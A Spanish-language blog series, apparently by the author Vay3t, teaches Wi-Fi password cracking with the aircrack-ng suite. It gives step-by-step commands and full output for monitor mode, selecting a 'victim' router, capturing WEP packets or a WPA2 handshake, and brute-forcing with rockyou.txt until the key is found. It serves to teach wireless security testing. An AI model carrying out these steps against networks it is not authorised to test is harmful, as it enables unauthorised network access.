 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 C0:56:27:DD:4F:63   -6 100     1154      290    0   6  54   WPA2 CCMP   PSK  c1sc0

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 C0:56:27:DD:4F:63  30:A8:DB:F1:66:82    0    1 - 1   3518    14635  c1sc0

Crackeando con aircrack-ng

Después de haber capturado el handshake lo que haremos ahora es usar fuerza bruta para poder romper la contraseña. Para eso necesitamos descargar un diccionario, uno genérico que recomiendo mucho es rockyou.txt

wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
bzip2 -d rockyou.txt.bz2

Ahora que tenemos el diccionario usamos aircrack-ng donde con -w rockyou.txt especificamos la ruta del diccionario y luego colocamos el nombre que le hemos puesto a la captura de airodump-ng agregando un -01.cap

root@vay3t:~# aircrack-ng -w rockyou.txt outout-01.cap
Opening outout-01.cap
Read 38818 packets.

   #  BSSID              ESSID                     Encryption

   1  C0:56:27:DD:4F:63  c1sc0                     WPA (1 handshake)

Choosing first network as target.

Opening outout-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.2 rc4

      [00:00:09] 6232/9822769 keys tested (634.98 k/s) 

      Time left: 4 hours, 18 minutes, 3 seconds                  0.06%

                           KEY FOUND! [ 19721972 ]


      Master Key     : FD 87 8D EA 6D 83 8C B7 91 84 77 EA BE FE 17 53 
                       E6 EA 82 CC 03 A8 35 DB 7D 90 4A A7 11 EC AE 43 

      Transient Key  : 78 64 90 59 B8 3A 5F 10 00 0E 25 84 C4 EB 51 55 
                       D6 C1 F3 85 9E F8 E7 ED 7D 23 DC 47 28 67 7F 04 
                       3A 71 CE 5C 86 FB 19 B1 D5 4A 32 AD 5D 62 24 DF 
                       E7 0C D5 BB 74 DA 39 DA FD 8F 37 FF 16 53 77 BD 

      EAPOL HMAC     : A6 A7 F5 44 1E DE 57 6E 8D 06 01 D3 34 F6 D7 7B

Y luego de esperar un momento ya tenemos nuestra contraseña:

KEY FOUND! [ 19721972 ]

Hacking Wi-Fi 2: Introducción a airodump-ng y crackeos a WEP

Vay3t — Sat, 12 Aug 2023 18:00:00 +0000

Uso de airodump-ng y crackeando contraseñas WEP con aircrack-ng.

¿Que es WEP?

Wired Equivalent Privacy: Data del año 1999, fue el primer tipo de contraseña que se fabricó para los routers Wifi, por lo tanto, todos los dispositivos son capaces de establecer contraseñas tipo WEP. Pero en el 2001 criptógrafos descubrieron como romperlo en pocos minutos. La estructura de la contraseña tipo WEP era hexadecimal, es decir, del 0 al 9 y de la A hasta la F, donde una contraseña de 64bits puede tener hasta 10 caracteres y una contraseña de 128bits puede tener hasta 26 caracteres. Actualmente es la más fácil de crackear, pero también la más escasa por ser la más vulnerable.

Crackeando WEP

El crackeo de la WEP consta de 4 pasos, el primero es colocar la tarjeta en modo monitor, el segundo es seleccionar un router víctima con clientes conectados, y la tercera es de capturar los paquetes de ese router, y el cuarto es crackear la contraseña en base a lo capturado.

Colocando la tarjeta en modo monitor

sudo airmon-ng start wlan1

Seleccionando víctima

Cuando usamos el siguiente comando airodump-ng wlan1mon lo que hacemos es usar la tarjeta en modo monitor para poder identificar las redes Wifi existentes.

root@vay3t:~# airodump-ng wlan1mon

 CH  2 ][ Elapsed: 0 s ][ 2017-10-30 17:54                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 C0:56:27:DD:4F:63  -33        2        0    0   6  54   WEP  WEP         c1sc0
 C0:05:C2:C2:04:B1  -71        2        0    0   7  54e. WPA2 CCMP   PSK  Movistar

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 C0:56:27:DD:4F:63  30:A8:DB:F1:66:82  -23    0 - 1      0        6

Ahora necesitamos comprender la información que está ahí

CH 2 ]: Representa el canal actual de la tarjeta, si no se especifica esta cambia a cada pocos segundos.
[ Elapsed: 0 s ]: Tiempo transcurrido desde que se usó el comando
[ 2017-10-30 17:54: Fecha y hora actual
PWR La potencia que nos llega del router en dbm
#Data: Cantidad de datos capturados
#/s: Cantidad de datos por segundo
CH: Canal actual del router
ENC: Sistema de cifrado del router
ESSID: Nombre del router
STATION: MAC del cliente, en caso de que en BSSID salga una MAC, significa de que el cliente esta conectado a ese router, en caso contrario si sale (not associated) significa que el cliente no está asociado a ningún router.

Ahora nos damos cuenta de que el router c1sc0 tiene ENC WEP lo que significa que nos interesa.

Capturando paquetes

Ya que hemos seleccionado nuestra víctima tenemos que capturar el #Data para poder posteriormente crackear la contraseña, para eso usamos el comando usado para poder seleccionar el BSSID y el CH para luego usar -w y así guardarlo con el nombre out. airodump-ng guardara varios archivos con nombre out-01.* Tenemos que esperar hasta tener al menos unos 5000 de #Data.

root@vay3t:~# airodump-ng wlan1mon --bssid C0:56:27:DD:4F:63 --channel 6 -w out
 CH  6 ][ Elapsed: 5 mins ][ 2017-10-30 18:04

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 C0:56:27:DD:4F:63  -37  90     3213        0    0   6  54   WEP  WEP    OPN  c1sc0

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 C0:56:27:DD:4F:63  30:A8:DB:F1:66:82  -23   54 - 1      0    28495  c1sc0

Crackeando con aircrack-ng

Luego de haber capturado unos cuantos #Data usaremos aircrack-ng para poder crackear la contraseña, para eso seleccionamos el archivo guardado por airodump-ng. El archivo que nos interesa es out-01.cap.

root@vay3t:~# aircrack-ng out-01.cap
Opening out-01.cap
Read 11063 packets.

   #  BSSID              ESSID                     Encryption

   1  C0:56:27:DD:4F:63  c1sc0                     WEP (4036 IVs)

Choosing first network as target.

Opening out-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 4036 ivs.


         Aircrack-ng 1.2 rc4


     [00:00:47] Tested 6553601 keys (got 5035 IVs)

   KB    depth   byte(vote)
    0    0/  1   97(8704) FE(8448) 23(7936) 21(7680) C7(7680) 
    1    0/  1   68(9216) 77(8448) 05(8192) C8(8192) 1E(7680) 
    2    0/  1   29(8960) 4A(8704) ED(8448) 7A(8192) 0F(7936) 
    3    0/  1   A5(8192) AB(7680) FC(7680) 64(7424) 7F(7424) 
    4    0/  1   29(8192) 6A(7936) C5(7936) C1(7424) DF(7424) 
    5    0/  1   E2(8960) 8C(8448) 04(7936) A6(7936) 1C(7680) 
    6    0/  1   CA(7680) 3D(7424) 57(7424) AA(7424) 19(7168) 
    7    0/  2   DB(8192) FA(8192) 98(7936) EF(7936) 1B(7680) 
    8    0/  8   6E(8448) 75(8192) FA(8192) F1(7680) 01(7424) 
    9    0/  1   C9(8448) 78(8192) 0D(7680) 91(7424) A7(7424) 
   10    0/  1   78(7936) DD(7680) F3(7680) 6A(7424) 3E(7168) 
   11    0/  1   F7(8192) 2C(7936) 06(7424) 0A(7424) 83(7424) 
   12    0/ 12   33(7980) BE(7616) B4(7396) AD(7320) AA(7212) 

         KEY FOUND! [ 64:64:64:64:64 ] (ASCII: ddddd )
  Decrypted correctly: 100%

Luego de esperar ya tenemos nuestra contraseña:

KEY FOUND! [ 64:64:64:64:64 ]

Hacking Wi-Fi 1: Conociendo aircrack-ng y el modo monitor

Vay3t — Sun, 06 Aug 2023 01:37:45 +0000

Instalando aircrack-ng y colocando la tarjeta wifi en modo monitor.

¿Que aircrack-ng?

aircrack-ng es una suite para crackeos de redes wifi, se centra en distintos tipos de ataques a protocolos WEP y WPA/WPA2. Para ocupar esta suite necesitamos privilegios de root.

Instalando aircrack-ng

sudo apt install aircrack-ng

¿Que es airmon-ng?

airmon-ng es una de las herramientas de la suite de aircrack-ng, sirve para colocar la tarjeta en modo monitor.

Modo monitor

(No confundir con modo promiscuo) Usualmente nuestra tarjeta escucha y habla con algún punto de acceso (router), al estar la tarjeta en modo monitor solo escucha a otras tarjetas cuando estas están comunicándose entre si.

Para poder capturar estos paquetes y poder posteriormente trabajar con estos paquetes, necesitamos identificar nuestra interfaz de red con la que trabajaremos, en mi caso usare una tarjeta de red externa TL-WN722n v1 (como ya no se fabrican recomiendo usar el AWUS036NHA) que actualmente es la wlan1.

root@vay3t:~# airmon-ng
[sudo] password for francisk0v: 

PHY Interface   Driver      Chipset

phy0    wlan0       iwlwifi     Intel Corporation Wireless 3160 (rev 83)
phy1    wlan1       ath9k_htc   Atheros Communications, Inc. AR9271 802.11n

Ahora usamos el siguiente comando para iniciar el modo monitor, si nos damos cuenta ahora nuestra interfaz de red cambia de nombre a wlan1mon.

root@vay3t:~# airmon-ng start wlan1

Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  792 avahi-daemon
  796 NetworkManager
  808 avahi-daemon
  909 wpa_supplicant
 5869 dhclient

PHY Interface   Driver      Chipset

phy0    wlan0       iwlwifi     Intel Corporation Wireless 3160 (rev 83)
phy1    wlan1       ath9k_htc   Atheros Communications, Inc. AR9271 802.11n

        (mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
        (mac80211 station mode vif disabled for [phy1]wlan1)

Ahora nuestra tarjeta esta lista para trabajar con la suite aircrack-ng o scapy.

No veo mi interfaz como wlanX

En caso de ver la interfaz con otro nombre que no sea wlanX te recomiendo usar el siguiente comando y luego reiniciar el equipo para aplicar las configuraciones:

sudo ln -s /dev/null /etc/udev/rules.d/80-net-setup-link.rules

DEV Community: Vay3t

Protocolo HTTP — Comprendiendo las tecnologías Web

Que es el protocolo HTTP?

Diferencia entre HTTP y HTTPS

Modelo de comunicación HTTP

Esquema de conexión Cliente — Servidor

Que servidores y clientes existen?

Servidores web:

Clientes web

Que es una URL?

Estructura de una URL

Estructura del protocolo

Ya, pero que significa todo esto?

Request

Response

Un poco de detalle… (Modo: DEBUG)

Webs modernas, las APIs

Backend y frontend

REST / SOAP

Estilos arquitectónicos existentes

Conceptos a entender

Usando la terminal

postmanlabs / httpbin

HTTP Request & Response Service, written in Python + Flask.

httpbin(1): HTTP Request & Response Service

Officially Deployed at:

SEE ALSO

Build Status

cURL

Creando un notificador en Telegram con Bash

Vay3t ・ Aug 26

Conclusión

Objetivo en la seguridad ofensiva

Autores

WTF es el Hacking?

WTF es un Hacker? (Opinión del autor)

Pentesting

Ciclo de vida de un ataque

Tipos de pentestings

Inteligencia en el ataque

Phishing

Para atacar al enemigo debes conocerlo

Cómo funciona la red e internet

Esquema de conexión Cliente — Servidor

Protocolos de internet

Software y lenguajes de programación

Lenguajes compilados, interpretados y administrados

Lenguajes recomendados

Conclusión

Creando un notificador en Telegram con Bash

¿En que consistirá el notificador?

Creando y configurando el bot con BotFather

Programando el bot

Casos de uso

Ejemplos

Conclusión

Bonus track

Hacking Wi-Fi 3: Crackeando WPA/WPA2 con aircrack-ng

¿Qué es WPA/WPA2?

Crackeando WPA/WPA2

Colocando la tarjeta en modo monitor

Seleccionando una víctima

Capturando el handshake

Crackeando con aircrack-ng

Hacking Wi-Fi 2: Introducción a airodump-ng y crackeos a WEP

¿Que es WEP?

Crackeando WEP

Colocando la tarjeta en modo monitor

Seleccionando víctima

Capturando paquetes

Crackeando con aircrack-ng

Hacking Wi-Fi 1: Conociendo aircrack-ng y el modo monitor

¿Que aircrack-ng?

Instalando aircrack-ng

¿Que es airmon-ng?

Modo monitor

No veo mi interfaz como wlanX